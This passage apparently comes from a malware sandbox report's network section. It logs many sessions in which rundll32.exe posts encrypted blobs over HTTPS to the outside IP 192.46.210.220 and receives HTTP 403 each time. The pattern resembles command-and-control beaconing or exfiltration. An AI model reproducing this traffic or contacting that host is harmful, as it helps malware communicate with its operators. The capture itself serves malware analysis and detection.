                                                                                                              2021-10-28 02:51:29 UTC374OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:29 UTC379INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:29 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              76192.168.2.450161192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:32 UTC379OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:32 UTC379OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:33 UTC389INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:33 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              77192.168.2.450162192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:32 UTC384OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:32 UTC384OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:33 UTC389INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:33 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              78192.168.2.450169192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:36 UTC389OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:36 UTC389OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:37 UTC399INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:37 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              79192.168.2.450170192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:36 UTC394OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:36 UTC394OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:37 UTC399INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:37 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              8192.168.2.449815192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:17 UTC39OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:17 UTC40OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:18 UTC44INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:18 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              80192.168.2.450177192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:40 UTC399OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:40 UTC399OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:41 UTC409INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:41 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              81192.168.2.450178192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:40 UTC404OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:40 UTC404OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:41 UTC409INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:41 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              82192.168.2.450185192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:44 UTC409OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:44 UTC409OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:44 UTC419INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:44 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              83192.168.2.450186192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:44 UTC414OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:44 UTC414OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:45 UTC419INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:45 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              84192.168.2.450193192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:48 UTC419OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:48 UTC419OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:48 UTC429INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:48 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              85192.168.2.450194192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:48 UTC424OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:48 UTC424OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:48 UTC429INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:48 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              86192.168.2.450201192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:51 UTC429OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:51 UTC429OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:52 UTC439INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:52 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              87192.168.2.450202192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:52 UTC434OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
